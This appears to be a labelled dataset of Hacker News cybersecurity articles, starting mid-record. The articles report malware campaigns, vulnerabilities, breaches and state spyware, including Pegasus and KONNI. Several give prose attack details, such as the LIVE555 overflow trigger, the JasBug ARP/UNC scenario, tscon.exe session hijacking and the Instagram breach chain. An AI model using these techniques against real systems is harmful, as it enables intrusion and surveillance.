and execute what analysts call a ""suicide script."" DHS and FBI have also provided downloadable lists of IP addresses with which the Hidden Cobra malware communicates and other IOCs, to help you block them and enable network defenses to reduce exposure to any malicious cyber activity by the North Korean government. DHS also recommended users and administrators to use best practices as preventive measures to protect their computer networks, like keeping their software and system up to date, running Antivirus software, turning off SMB, forbidding unknown executables and software applications. Last year, the DHS and the FBI published an alert describing Hidden Cobra malware, called Delta Charlie—a DDoS tool which they believed North Korea uses to launch distributed denial-of-service (DDoS) attacks against its targets. Other malware linked to Hidden Cobra in the past include Destover, Wild Positron or Duuzer, and Hangman with sophisticated capabilities, like DDoS botnets, keyloggers, remote access tools (RATs), and wiper malware. ",Cyber_Attack Critical Code Execution Flaw Found in LIVE555 Streaming Library,https://thehackernews.com/2018/10/critical-flaw-found-in-streaming.html,"Security researchers have discovered a serious code execution vulnerability in the LIVE555 streaming media library—which is being used by popular media players, along with a number of embedded devices capable of streaming media. LIVE555 streaming media, developed and maintained by Live Networks, is a set of C++ libraries companies and application developers use to stream multimedia over open standard protocols like RTP/RTCP, RTSP or SIP. The LIVE555 streaming media libraries support streaming, receiving, and processing of various video formats such as MPEG, H.265, H.264, H.263+, VP8, DV, and JPEG video, and several audio codecs such as MPEG, AAC, AMR, AC-3, and Vorbis. UPDATE: LIVE555 streaming media library supports both server and client, and is internally being used by many well-known media software such as VLC and MPlayer, security researchers at Talos mentioned in the advisory. Though researchers didn't specify if the vulnerable component (a server-side library) is being used by the popular VLC player, team at VLC today contacted THN and clarified that their media player application is using LIVE555 streaming media at the client-side only. The code execution vulnerability, tracked as CVE-2018-4013 and discovered by researcher Lilith Wyatt of Cisco Talos Intelligence Group, resides in the HTTP packet-parsing functionality of the LIVE555 RTSP, which parses HTTP headers for tunneling RTSP over HTTP. ""A specially crafted packet can cause a stack-based buffer overflow, resulting in code execution,"" Cisco Talos' security advisory says. ""An attacker can send a packet to trigger this vulnerability."" To exploit this vulnerability, all an attacker needs to do is create and send ""a packet containing multiple 'Accept:' or 'x-sessioncookie' strings"" to the vulnerable application, which will trigger a stack buffer overflow in the 'lookForHeader' function, leading to arbitrary code execution. Cisco Talos team confirmed the vulnerability in Live Networks LIVE555 Media Server version 0.92, but the team believes the security issue may also be present in the earlier version of the product. Cisco Talos responsibly reported the vulnerability to Live Networks on October 10 and publicly disclosed the security issue on October 18 after the vendor released security patches on October 17. ",Vulnerability US and Global Allies Accuse China of Massive Microsoft Exchange Attack,https://thehackernews.com/2021/07/us-and-global-allies-accuse-china-of.html,"The U.S. government and its key allies, including the European Union, the U.K., and NATO, formally attributed the massive cyberattack against Microsoft Exchange email servers to state-sponsored hacking crews working affiliated with the People's Republic of China's Ministry of State Security (MSS). In a statement issued by the White House on Monday, the administration said, ""with a high degree of confidence that malicious cyber actors affiliated with PRC's MSS conducted cyber-espionage operations utilizing the zero-day vulnerabilities in Microsoft Exchange Server disclosed in early March 2021. The U.K. government accused Beijing of a ""pervasive pattern of hacking"" and ""systemic cyber sabotage."" The sweeping espionage campaign exploited four previously undiscovered vulnerabilities in Microsoft Exchange software and is believed to have hit at least 30,000 organizations in the U.S. and hundreds of thousands more worldwide. Microsoft identified the group behind the hack as a skilled government-backed actor operating out of China named Hafnium. Calling it ""the most significant and widespread cyber intrusion against the U.K. and allies,"" the National Cyber Security Centre (NCSC) said the attack was highly likely to enable ""acquiring personally identifiable information and intellectual property."" In addition, the MSS was also outed as the party behind a series of malicious cyber activities tracked under the monikers ""APT40"" and ""APT31,"" with the U.K. attributing the groups for targeting maritime industries and naval defence contractors in the U.S. and Europe, and as well as for executing the attack on the Finnish parliament in 2020. Also, on Monday, the U.S. Federal Bureau of Investigation (FBI), National Security Agency (NSA), and Cybersecurity and Infrastructure Security Agency (CISA) released a joint advisory listing over 50 tactics, techniques, and procedures employed by APT40 and other Chinese state-sponsored cyber actors. ""It has been a few months since attackers exploited the Hafnium related bugs in Exchange to deploy ransomware, like DearCry and Black Kingdom,"" Mark Loman, director of engineering at Sophos, said in an emailed statement. ""In general, to protect themselves, ransomware operators typically operate from the dark web, or via one or more compromised servers hosted in countries other than the physical location of the attackers. This makes attack attribution hard, but not impossible."" US Indicts Members of APT 40 Chinese Hacking Group In a related development, the U.S. Department of Justice (DoJ) pressed criminal charges against four MSS hackers belonging to the APT40 group concerning a multiyear campaign targeting foreign governments and entities in maritime, aviation, defense, education, and healthcare sectors in the least a dozen countries to facilitate the theft of trade secrets, intellectual property, and high-value information. Separately, the NCSC also announced that a group known as ""APT10"" acted on behalf of the MSS to carry out a sustained cyber campaign focused on large-scale service providers with the goal of seeking to gain access to commercial secrets and intellectual property data in Europe, Asia, and the U.S. ""APT 10 has an enduring relationship with the Chinese Ministry of State Security, and operates to meet Chinese State requirements,"" the intelligence agency said. In a press statement, the European Union urged Chinese authorities to take action against malicious cyber activities undertaken from its territory, stating the Microsoft Exchange server hacks resulted in security risks and significant economic loss for government institutions and private companies. The Chinese government has repeatedly denied claims of state-sponsored intrusions. A spokesperson for the Chinese Embassy in Washington, according to the Associated Press, painted China as ""a severe victim of the U.S. cyber theft, eavesdropping, and surveillance,"" noting that the ""U.S. has repeatedly made groundless attacks and malicious smear against China on cybersecurity."" ""The PRC has fostered an intelligence enterprise that includes contract hackers who also conduct unsanctioned cyber operations worldwide, including for their own personal profit,"" the White House said, adding ""hackers with a history of working for the PRC Ministry of State Security (MSS) have engaged in ransomware attacks, cyber enabled extortion, cryptojacking, and rank theft from victims around the world, all for financial gain."" Update: Speaking at a press conference, Zhao Lijian, a spokesperson for the Chinese Ministry of Foreign Affairs, rejected accusations that Beijing was behind the global cyber hacking campaign targeting Microsoft Exchange servers and accused the U.S. of being the world's largest source of attacks in cyberspace. ""China firmly opposes and combats all forms of cyber attacks. It will never encourage, support or condone cyber attacks. This position has been consistent and clear,"" Lijian said. ""Given the virtual nature of cyberspace and the fact that there are all kinds of online actors who are difficult to trace, it's important to have enough evidence when investigating and identifying cyber-related incidents. It requires extra prudence when linking cyber attacks with the government of any country. The so-called technical details released by the U.S. side do not constitute a complete chain of evidence."" ",Cyber_Attack Android malware - Works on remote commands form encrypted blog,https://thehackernews.com/2011/10/android-malware-works-on-remote.html,"Android malware - Works on remote commands form encrypted blog Researchers from Trend Micro have spotted a piece of malicious software for Android. This is the first known Android malware that reads blog posts and interprets these as commands. It can also download and install additional applications, therefore further compromising the affected device. Trend Micro calls the malware ""ANDROIDOS_ANSERVER.A."" If the application is installed, it asks for a variety of permissions. If those are granted, it can then make calls, read log files, write and receive SMSes and access the Internet and network settings, among other functions. This backdoor may be unknowingly downloaded by a user while visiting malicious websites. It may be manually installed by a user. ""This is a blog site with encrypted content, which based on our research, is the first time Android malware implemented this kind of technique to communicate,"" wrote Karl Dominguez, a Trend Micro threat response engineer. We recommend that users should be cautious when downloading Android applications from third party application stores due to the number of rogue applications that have been found. ",Malware "Java-Bot, a Cross-platform malware launching DDoS attacks from infected computers",https://thehackernews.com/2014/01/java-bot-cross-platform-malware.html,"These days botnets are all over the news. In simple terms, a botnet is a group of computers networked together, running a piece of malicious software that allows them to be controlled by a remote attacker. A major target for most of the malware is still Windows, but the growing market of Mac OS X, Linux and Smartphones, is also giving a solid reason to cyber criminals to focus. Recently, Kaspersky Lab has detected another cross-platform Java-Bot, capable of infecting computers running Windows, Mac OS X, and Linux that has Java Runtime Environment installed. Last year, Zoltan Balazs - CTO at MRG Effitas submitted the samples of malicious Java application for analysis to Kaspersky Lab and they identified it as HEUR:Backdoor.Java.Agent.a. According to researchers, to compromise computers, Java-Bot is exploiting a previously known critical Java vulnerability CVE-2013-2465 that was patched in last June. The vulnerability persists in Java 7 u21 and earlier versions. CVE-2013-2465 description says: An unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 21 and earlier, 6 Update 45 and earlier, and 5.0 Update 45 and earlier, and OpenJDK 7, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to 2D. Once the bot has infected a computer, for automatic initialization the malware copies itself into the home directory, and registers itself with system startup programs. The Malware is designed to launch distributed denial-of-service (DDOS) attacks from infected computers. It uses the following methods to start it based on the target operating system: For Windows – HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Mac OS – the standard Mac OS service launch is used For Linux – /etc/init.d/ The malware authors used Zelix Klassmaster Obfuscator (encryption) to make the analysis more difficult. It creates a separate key for the classes developed due to which analysis of all classes has to be done to get the decryption keys. The botnet executable contains an encrypted configuration file for the Mac OS 'launchd service'. It also encrypts internal working methodology of malware. The malware uses PricBot an open framework for implementing communication via IRC. Zombie computers, then report to an Internet relay chat (IRC) channel that acts as a Command-and-control server. The Botnet supports HTTP, UDP protocols for flooding (DDoS attack) a target whose details i.e. Address, port number, attack duration, number of threads to be used are received from the IRC channel. Users should update their Java software to the latest release of Java 7 update 51 of 14 January 2014, can be found on Oracle's Java website. The next scheduled security update for Java is on 14 April 2014. ",Malware 15-Year-Old JasBug Vulnerability Affects All Versions of Microsoft Windows,https://thehackernews.com/2015/02/jasbug-windows-vulnerability.html,"Microsoft just issued a critical patch to fix a 15-year-old vulnerability that could be exploited by hackers to remotely hijack users' PCs running all supported versions of Windows operating system. The critical vulnerability — named ""JASBUG"" by the researcher who reported the flaw — is due to a flaw in the fundamental design of Windows that took Microsoft more than 12 months to release a fix. However, the flaw is still unpatched in Windows Server 2003, leaving the version wide open to the hackers for the remaining five months. HACKERS CAN EASILY HIJACK YOUR WINDOWS MACHINE The vulnerability (CVE-2015-0008) could allow an attacker to easily hijack a domain-configured Windows system if it is connected to a malicious network – wirelessly or wired, giving attacker consent to do various tasks including, to go forth and install programs; delete, alter or peruse users' data; or to create new accounts with full user rights. However, Jasbug vulnerability do not affects home users because they are not usually domain-configured, but the bug is a massive discomfort for IT pros who typically connect to business, corporate, or government networks using the Active Directory service. The vulnerability, classified as MS15-011, allows hackers who are in a position to monitor traffic passing between the user and the Active Directory network to launch a Man-in-the-Middle (MitM) attack in order to execute malicious code on vulnerable systems. AFFECTED WINDOWS VERSIONS Windows Vista Windows 7 Windows 8 Windows RT Windows 8.1 Windows RT 8.1 Windows Server 2003 Windows Server 2008 Windows Server 2008 R2 Windows Server 2012 Windows Server 2012 R2 HOW JASBUG WORKS Microsoft, on its blog post, provided the following example of how a malicious hacker could exploit the Jasbug vulnerability on a machine connected over open Wi-Fi at a coffee shop: This is an example of a 'coffee shop' attack scenario, where an attacker would attempt to make changes to a shared network switch in a public place and can direct the client traffic an attacker-controlled system. In this scenario, the attacker has observed traffic across the switch and found that a specific machine is attempting to download a file located at the UNC path: \\10.0.0.100\Share\Login.bat . On the attacker machine, a share is set up that exactly matches the UNC path of the file requested by the victim: \\*\Share\Login.bat. The attacker will have crafted the contents of Login.bat to execute arbitrary, malicious code on the target system. Depending on the service requesting Login.bat, this could be executed as the local user or as the SYSTEM account on the victim's machine. The attacker then modifies the ARP table in the local switch to ensure that traffic intended for the target server 10.0.0.100 is now routed through to the attacker's machine. When the victim's machine next requests the file, the attacker's machine will return the malicious version of Login.bat. This scenario also illustrates that this attack cannot be used broadly across the internet – an attacker need to target a specific system or group of systems that request files with this unique UNC. MORE PATCHES TO APPLY In addition to Jasbug vulnerability, Microsoft released two other security updates that are rated critical, both with the potential to allow remote code execution on a vulnerable machine. MS15-009: The update patches 41 reported vulnerabilities, one publicly disclosed flaw and 40 privately reported vulnerabilities, in Internet Explorer affecting all versions of the browser from version 6 and above on all operating systems. MS15-010: This security update patches six vulnerabilities, one publicly disclosed flaw and remaining reported privately, in Windows 7 and above, and server software after Windows Server 2008 R2 and later editions. The vulnerabilities are due to the way a Windows kernel-level component handles TrueType fonts. The remaining six patches in Microsoft's February Patch update are all rated ""important"" by Redmond. Two vulnerabilities in Microsoft Office could allow RCE and security feature bypass, and bugs in Windows that could allow elevation of privilege, security feature bypass and information disclosure. Also a vulnerability in Virtual Machine Manager (VMM) could give an attacker elevated privileges. ",Vulnerability CA security finds Android Trojan which records phone calls,https://thehackernews.com/2011/08/ca-security-finds-android-trojan-which.html,"CA security finds Android Trojan which records phone calls A new Android Trojan is capable of recording phone conversations, according to a CA security researcher. The trojan is triggered when the Android device places or receives a phone call. It saves the audio file and related information to the phone's microSD card, and includes a configuration file with information on a remote server and settings used by the trojan. The malware also ""drops a 'configuration' file that contains key information about the remote server and the parameters,"" CA security researcher Dinesh Venkatesan writes in a blog, perhaps suggesting that the recorded calls can be uploaded to a server maintained by an attacker. According to the post, the trojan presents itself as an ""Android System Message"" that requires users to press an ""Install"" button for it to insert itself in the phone. Once installed, the trojan records all incoming and outgoing calls to a directory on the microSD card as .amr files, as well as information about the call, including its duration, in a text file. Venkatesan tested the Trojan in ""a controlled environment with two mobile emulators running along with simulated Internet services,"" and posted screenshots with the results. It appears the Trojan can only be installed if the Android device owner clicks the ""install"" button on a message that looks strikingly similar to the installation screens of legitimate applications. ""As it is already widely acknowledged that this year is the year of mobile malware, we advice the smartphone users to be more logical and exercise the basic security principles while surfing and installing any applications,"" Venkatesan writes. ",Malware iPhone can be used as spy phone to get desktop Keystrokes,https://thehackernews.com/2011/10/iphone-can-be-used-as-spy-phone-to-get.html,"iPhone can be used as spy phone to get desktop Keystrokes What if a hacker could log every key you typed on your PC by placing a cellphone nearby? US researchers have shown how this is possible using any smartphone available today. At a conference in Chicago on Thursday, a group of computer researchers from Georgia Tech will report on another potential threat. The researchers have shown that the accelerometer and orientation sensor of a phone resting on a surface can be used to eavesdrop as a password is entered using a keyboard on the same surface. They were able to capture the words typed on the keyboard with as much as 80 percent accuracy. Normally when security researchers describe spyware on smartphones, they mean malicious code that can be used to snoop on calls, or to steal the data held on mobile phones.In this case, however, researchers have described how they have put software on smartphones to spy on activity outside the phone itself - specifically to track what a user might be doing on a regular desktop keyboard nearby. The typing detection works by ""using a smartphone accelerometer – the internal device that detects when and how the phone is tilted – to sense keyboard vibrations as you type to decipher complete sentences with up to 80% accuracy,"" according to the Institute. ""We first tried our experiments with an iPhone 3GS, and the results were difficult to read,"" said Patrick Traynor of Georgia Tech. ""But then we tried an iPhone 4, which has an added gyroscope to clean up the accelerometer noise, and the results were much better. We believe that most smartphones made in the last two years are sophisticated enough to do this attack."" As phone technology improves, attacks via the accelerometer could become more feasible. The researchers' initial experiments used Apple's iPhone 3GS, but the phone's accelerometer lacked the necessary sensitivity. The researchers then moved to the iPhone 4, which uses a gyroscope to remove noise from the accelerometer data, and had much greater success. ""The way we see this attack working is that you, the phone's owner, would request or be asked to download an innocuous-looking application, which doesn't ask you for the use of any suspicious phone sensors,"" said Henry Carter, one of the study's co-authors . ""Then the keyboarddetection malware is turned on, and the next time you place your phone next to the keyboard , it starts listening."" ",Vulnerability Hacker Reveals Easiest Way to Hijack Privileged Windows User Session Without Password,https://thehackernews.com/2017/03/hack-windows-user-account.html,"You may be aware of the fact that a local Windows user with system rights and permissions can reset the password for other users, but did you know that a local user can also hijack other users' session, including domain admin/system user, without knowing their passwords? Alexander Korznikov, an Israeli security researcher, has recently demonstrated that a local privileged user can even hijack the session of any logged-in Windows user who has higher privileges without knowing that user's password, using built-in command line tools. This trick works on almost all versions of Windows operating system and does not require any special privileges. Korznikov is himself unable to figure out if it is a Windows feature or a security flaw. The issue discovered by Korznikov is not entirely new, as a French security researcher, namely Benjamin Delpy, detailed a similar user session hijacking technique on his blog some six years ago. Korznikov calls the attack a ""privilege escalation and session hijacking,"" which could allow an attacker to hijack high-privileged users' session and gain unauthorized access to applications and other sensitive data. For successful exploitation, an attacker requires physical access to the targeted machine, but using Remote Desktop Protocol (RDP) session on a hacked machine; the attack can be performed remotely as well. Video Demonstrations and PoC Exploit Released! Korznikov has also provided a few video demonstrations of a successful session hijacking (using Task manager, service creation, as well as command line), along with Proof-of-Concept (PoC) exploit. Korznikov successfully tested the flaw on the newest Windows 10, Windows 7, Windows Server 2008 and Windows Server 2012 R2, though another researcher confirmed on Twitter that the flaw works on every Windows version, even if the workstation is locked. While Microsoft does not deem it to be a security vulnerability and some experts argued that a Windows user with administrative permissions can do anything, Korznikov explained a simple attack scenario to explain how a malicious insider can easily misuse this flaw: ""Some bank employee have access to the billing system and its credentials to log in. One day, he comes to work, logging into the billing system and start to work. At lunchtime, he locks his workstation and goes out for lunch. Meanwhile, the system administrator gets to can use this exploit to access employee's workstation."" ""According to the bank's policy, administrator's account should not have access to the billing system, but with a couple of built-in commands in windows, this system administrator will hijack employee's desktop which he left locked. From now, a sysadmin can perform malicious actions in billing system as billing employee account."" Well, no doubt, alternatively an attacker can also dump out system memory to retrieve users' passwords in plaintext, but this is a long and complicated process compared to just running tscon.exe with a session number without leaving any trace and using any external tool. The issue has been known to Microsoft since last six years, so it's likely the company doesn't consider it a security flaw as it requires local admin rights on the computer, and deems this is how its operating system is supposed to behave. ",Vulnerability Shocking! Instagram HACKED! Researcher hacked into Instagram Server and Admin Panel,https://thehackernews.com/2015/12/how-to-hack-instagram.html,"Ever wonder how to hack Instagram or how to hack a facebook account? Well, someone just did it! But, remember, even responsibly reporting a security vulnerability could end up in taking legal actions against you. An independent security researcher claims he was threatened by Facebook after he responsibly revealed a series of security vulnerabilities and configuration flaws that allowed him to successfully gained access to sensitive data stored on Instagram servers, including: Source Code of Instagram website SSL Certificates and Private Keys for Instagram Keys used to sign authentication cookies Personal details of Instagram Users and Employees Email server credentials Keys for over a half-dozen critical other functions However, instead of paying him a reward, Facebook has threatened to sue the researcher of intentionally withholding flaws and information from its team. Wesley Weinberg, a senior security researcher at Synack, participated in Facebook's bug bounty program and started analyzing Instagram systems after one of his friends hinted him to a potentially vulnerable server located at sensu.instagram.com The researcher found an RCE (Remote Code Execution) bug in the way it processed users' session cookies that are generally used to remember users' log-in details. Remote code execution bug was possible due to two weaknesses: The Sensu-Admin web app running on the server contained a hard-coded Ruby secret token The host running a version of Ruby (3.x) that was susceptible to code execution via the Ruby session cookie Exploiting the vulnerability, Weinberg was able to force the server to vomit up a database containing login details, including credentials, of Instagram and Facebook employees. Although the passwords were encrypted with 'bcrypt', Weinberg was able to crack a dozen of passwords that had been very weak (like changeme, instagram, password) in just a few minutes. Exposed EVERYTHING including Your Selfies Weinberg did not stop here. He took a close look at other configuration files he found on the server and discovered that one of the files contained some keys for Amazon Web Services accounts, the cloud computing service used to host Instagram's Sensu setup. These keys listed 82 Amazon S3 buckets (storage units), but these buckets were unique. He found nothing sensitive in the latest file in that bucket, but when he looked at the older version of the file, he found another key pair that let him read the contents of all 82 buckets. Weinberg had inadvertently stumbled upon almost EVERYTHING including: Instagram's source code SSL certificates and private keys (including for instagram.com and *.instagram.com) API keys that are used for interacting with other services Images uploaded by Instagram users Static content from the instagram.com website Email server credentials iOS/Android app signing keys Other sensitive data ""To say that I had gained access to basically all of Instagram's secret key material would probably be a fair statement,"" Weinberg wrote in his blog. ""With the keys I obtained, I could now easily impersonate Instagram, or any valid user or staff member. While out of scope, I would have easily been able to gain full access to any user's account, [personal] pictures and data."" Responsible Disclosure, but Facebook Threatens Lawsuit Weinberg reported his findings to Facebook's security team, but the social media giant was concerned he had accessed private data of its users and employees while uncovering the issues. Instead of receiving a reward from Facebook for his hard work, Weinberg was unqualified for the bug bounty program by Facebook. In early December, Weinberg claims his boss Synack CEO, Jay Kaplan, received a scary call from Facebook security chief Alex Stamos regarding the weaknesses Weinberg discovered in Instagram that left Instagram and Facebook users wide open to a devastating attack. Stamos ""stated that he did not want to have to get Facebook's legal team involved, but that he was not sure if this was something he needed to go to law enforcement over,"" Weinberg wrote in his blog in a section entitled 'Threats and Intimidation.' In response, Stamos issued a statement, saying he ""did not threaten legal action against Synack or [Weinberg] nor did [he] ask for [Weinberg] to be fired."" Stamos said he only told Kaplan to ""keep this out of the hands of the lawyers on both sides."" ""Condoning researchers going well above and beyond what is necessary to find and fix critical issues would create a precedent that could be used by those aiming to violate the privacy of our users, and such behavior by legitimate security researchers puts the future of paid bug bounties at risk,"" Stamos added. Facebook Responds After the original publication by the researcher, Facebook issued its response, saying the claims are false and that Weinberg was never told not to publish his findings, rather only asked not to disclose the non-public information he accessed. The social media giant confirmed the existence of the remote code execution bug in the sensu.instagram.com domain and promised a bug bounty of $2,500 as a reward to Weinberg and his friend who initially hinted that the server was openly accessible. However, the other vulnerabilities that allowed Weinberg to gain access to sensitive data were not qualified, with Facebook saying he violated user privacy while accessing the data. Here's the full statement by Facebook: We are strong advocates of the security researcher community and have built positive relationships with thousands of people through our bug bounty program. These interactions must include trust, however, and that includes reporting the details of bugs that are found and not using them to access private information in an unauthorized manner. In this case, the researcher intentionally withheld bugs and information from our team and went far beyond the guidelines of our program to pull private, non-user data from internal systems. We paid him for his initial bug report based on the quality, even though he was not the first to report it, but we didn't pay for the subsequent information that he had withheld. At no point did we say he could not publish his findings — we asked that he refrain from disclosing the non-public information he accessed in violation of our program guidelines. We remain firmly committed to paying for high quality research and helping the community learn from researchers' hard work. ",Vulnerability Google Chrome blocks access to Twitpic for Malware risk,https://thehackernews.com/2012/12/google-chrome-blocks-access-to-twitpic.html,"Suddenly today Google Chrome start detecting Twitpic.com as malware threat. Twitpic is one of the most popular website for Sharing photos and videos on Twitter. Twitpic denies and said that there is no malware on the website and is trying to contact Google. We also notice that, Twitter profiles and pages with Twitpic URL in tweets are also blocked curretly by Chrome. Many people also complaining about this on Google Help forum. An official statement from Twitpic via tweet,""Working to fix the google chrome malware notice when visiting Twitpic.com as this is not true or the case, trying to contact google"". Google's Safe Browsing Diagnostic page for twitpic.com saying, ""Site is listed as suspicious - visiting this web site may harm your computer. Of the 12029 pages we tested on the site over the past 90 days, 0 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2012-12-30, and suspicious content was never found on this site within the past 90 days."" Also Google report said,""No, this site has not hosted malicious software over the past 90 days. In some cases, third parties can add malicious code to legitimate sites, which would cause us to show the warning message."" There are no further information yet available, we will update you soon ! ",Malware Watch Out for Malware If You're Interested in North Korean Missile Program,https://thehackernews.com/2017/07/north-korea-missile-malware.html,"If you hold an interest in the North Korean Missile Program and are one of those curious to know capabilities of the recently tested North Korean long-range missile than you could be a target of a new malware campaign. North Korea claims to have conducted the first test of an intercontinental ballistic missile (ICBM), the Hwasong-14, on 3rd July, and US officials believe the country may have fired a brand-new missile that has not been seen before. Now, just a day after the test missile launch, hackers have started utilizing the news to target people interested in North Korean missile arsenal that has progressed over the decades from crude artillery rockets to testing what the country claims long-range missiles that could strike targets in the United States. Security researchers at Talos Intelligence have discovered a new malware campaign that started on 4th July to target victims with KONNI, an unknown Remote Access Trojan (RAT) that has been in use for over three years. The KONNI malware is a Remote Access Trojan designed to steal files, record keystrokes, perform screenshots, get the system information, including hostname, IP address, username, OS version and installed software, as well as execute malicious code on the infected computer. How Does the KONNI Malware Work? The hackers use an email attachment as the initial infection vector to deliver the Trojan through an executable file, which when opened displays an MS Office document that disguised as an article about the test missile launch. However, the content of the document is copy/pasted from an article published on July 3rd by South Korean Yonhap News Agency. In reality, the malicious executable drops two different versions of KONNI: event.dll and errorevent.dll. On 64-bit versions of Windows, both binaries are dropped, while just errorevent.dll is dropped on 32-bit versions of Windows. The dropped malware is then immediately executed to ""ensure that the malware persists and is executed on rebooting the compromised system,"" the researchers say. C&C Server Disguises as a Legitimate Climbing Club Website The malware uses a new Command and Control server hosted on a website that disguises as a legitimate climbing club, but the site does not actually contain any real text, but the default text of the CMS (Content Management System). The C&C traffic of the malware also takes place as ""HTTP post requests to web pages hosted as /weget/download.php, /weget/uploadtm.php or /weget/upload.php on the domain itself."" In addition, the website also contains a contact section with an address in USA, but the map below the address points to a location in Seoul, South Korea. ""The threat actors associated with KONNI typically use decoy documents relating to North Korea, and this campaign is no exception. However, in contrast to the convincing decoy document lifted from a third party, the content of the decoy website hosted on the CnC server does not look legitimate,"" the researchers concluded. ""Nevertheless, this threat actor continues to remain active and continues to develop updated versions of their malware. Organizations which may have an interest in the contents of this decoy document and that used in previous campaigns should ensure that they are adequately protected against this and subsequent campaigns."" So, my advice for users to remain protected from such malware is always be suspicious of uninvited documents sent over an email and never click on links inside those documents unless verifying the source. Additionally, keep your systems and antivirus updated to protect against any latest threat. ",Malware Widespread Instagram Hack Locking Users Out of Their Accounts,https://thehackernews.com/2018/08/hack-instagram-accounts.html,"Instagram has been hit by a widespread hacking campaign that appears to stem from Russia and have affected hundreds of users over the past week, leaving them locked out of their accounts. A growing number of Instagram users are taking to social media, including Twitter and Reddit, to report a mysterious hack which involves locking them out of their account with their email addresses changed to .ru domains. According to victims, their account names, profile pictures, passwords, email addresses associated with their Instagram accounts, and even connected Facebook accounts are being changed in the attack. Many of the affected Instagram users are also complaining about their profile photos replaced with stills from popular films, including Despicable Me 3 and Pirates of the Caribbean. Although it is still unknown who is behind the widespread hack of Instagram accounts, the use of the email addresses originating from Russian email provider mail.ru may indicate a Russian hacker or hacking group is behind the attack, or perhaps hackers pretending to be from Russia. First spotted by Mashable, the hack even affected Instagram users with two-factor authentication (2FA) enabled, as at least one user told Mashable that he was using 2FA, but it did nothing to stop his account from being hacked. However, it is currently unconfirmed. In response to the report, Instagram published a blog post saying that the company continues to investigate the issue and that it has ""dedicated teams helping people to secure their accounts."" ""We are aware that some people are having difficulty accessing their Instagram accounts,"" Instagram says, pointing users to its guidance on hacked accounts to help keep their account secure. The company advises Instagram users to keep a secure password with at least six numbers and/or letters, enable 2FA for additional security, and to revoke any suspicious third-party app that might have access to their accounts. Instagram currently relies on text messages for two-factor authentication, which is believed to be less secure than other app-based 2FA methods, but the Facebook-owned company says it is working on improving its 2FA settings. However, since the unknown technique being used by attackers to hack Instagram accounts is still unaddressed, there's nothing much you can do if the suspected loophole can also bypass two-factor authentication. The motive behind the attacks is still unknown, but it appears that the attacks on Instagram are still happening at the time of writing. For more information, users are recommended to visit the Instagram Help Centre dedicated to hacked accounts, which includes security tips as well as steps they can take to restore their account. ",Cyber_Attack Facebook Collected Your Android Call History and SMS Data For Years,https://thehackernews.com/2018/03/facebook-android-data.html,"Facebook knows a lot about you, your likes and dislikes—it's no surprise. But do you know, if you have installed Facebook Messenger app on your Android device, there are chances that the company had been collecting your contacts, SMS, and call history data at least until late last year. A tweet from Dylan McKay, a New Zealand-based programmer, which received more than 38,000 retweets (at the time of writing), showed how he found his year-old data—including complete logs of incoming and outgoing calls and SMS messages—in an archive he downloaded (as a ZIP file) from Facebook. Facebook was collecting this data on its users from last few years, which was even reported earlier in media, but the story did not get much attention at that time. Since Facebook had been embroiled into controversies over its data sharing practices after the Cambridge Analytica scandal last week, tweets from McKay went viral and has now fueled the never-ending privacy debate. A Facebook spokesperson explained, since almost all social networking sites have been designed to make it easier for users to connect with their friends and family members, Facebook also uploads its users' contacts to offer same. As Ars reported, in older versions of Android when permissions were a lot less strict, the Facebook app took away contact permission at the time of installation that allowed the company access to call and message data automatically. Eventually, Google changed the way Android permissions worked in version 16 of its API, making them more clear and granular by informing users whenever any app tries to execute permissions. However, developers were able to bypass this change, and Facebook continued accessing call and SMS data until Google deprecated version 4.0 of the Android API in October last year. Even you can check what data the social network has collected on you so far by going to your Facebook's Settings→Download a copy of your Facebook data→Start My Archive. If you don't want Facebook to store or continuously upload your contacts to its server, you can turn off the continuous uploading setting in the Messenger app. This change will also delete all your previously uploaded contacts. Facebook users on Apple devices are on the safer side, as iOS has never allowed silent access to call data. ",Data_Breaches "Mexican Govt. Allegedly Used Spyware Against Journalists, Activists & A Child",https://thehackernews.com/2017/06/mexican-spyware-malware.html,"After the disclosure of sophisticated global espionage and disinformation campaign aimed to discredit enemies of the state, Citizen Lab researchers exposed the dirty game of the Mexican government and its politics. The report — ""Government Spy: Systematic monitoring of journalists and human rights defenders in Mexico"" — published by Citizen Lab today revealed how the Mexican government used advanced spyware tools purchased from the NSO Group to target the country's most prominent human rights lawyers, anti-corruption activists, and journalists. The NSO Group, an Israel-based company that produces the most advanced mobile spyware on the planet, sold the tool to governments with an explicit agreement that it should be used only to fight terrorists or criminal groups that have long kidnapped and killed Mexicans. But, the Mexican government targets include: Lawyers looking into the case of 43 Students disappeared in September 2014 from the town of Iguala. Two Mexican most influential journalists. An American who is representing victims of sexual abuse by the police. A child, presumably in an attempt to spy on his mother. ""The targets share a basic connection: they have been involved in investigating or working on reports of high-level official corruption, or government involvement in human rights abuses,"" the report says. According to the report, the purchase of the NSO Group's exploit ""has been documented by at least three units in Mexico: the National Defense Secretariat (SEDENA) the Attorney General's Office (PGR) the National Security and Investigation Center (CISEN) Since 2011, the above three Mexican federal agencies have purchased nearly $80 Million worth of spyware from the NSO group. The surveillance tool in question is the infamous mobile spyware 'Pegasus' that was also used in targeted cyber attacks against human rights activists in the United Arab Emirates last year. Pegasus is one of the NSO group's most advanced mobile spyware tool that can infiltrate Android, as well as iPhones to monitor calls, texts, email, contacts, and calendars, as well as use the phone's microphone and camera for surveillance, turning a target's smartphone into a sophisticated bugging device. According to the report, the targets had received over 76 messages with links to the Pegasus exploit along with uniquely crafted social engineering messages, ""troubling personal and sexual taunts, messages impersonating official communications by the Embassy of the United States in Mexico, fake AMBER Alerts, warnings of kidnappings, and other threats."" Once the victims open the link, Pegasus would then get downloaded onto their smartphones, turning the target's smartphone into a digital spying tool, which is in the pocket of victims, but fully under the control of the operator. The malware allows the attacker to extract an incredible amount of data stored in files, contacts, messages, and emails and then forward them to a hidden server. It also takes control of the smartphone's microphone and camera — all without users' knowledge. Among those targeted by the government include: Activists with the Centro Miguel Agustín Pro Juárez for Human Rights (Centro PRODH) Members of the Mexican Institute for Competitiveness (IMCO) TV personality and investigative journalist Carmen Aristegui, along with her son Emilio Aristegui (a teenager) Other journalists working for the Mexican non-profit Against Corruption and Impunity TV network Televisa anchor Carlos Loret de Mola A majority of the infection attempts on victims were recorded under two separate events: in August 2015 and between April 2016 and July 2016. The report 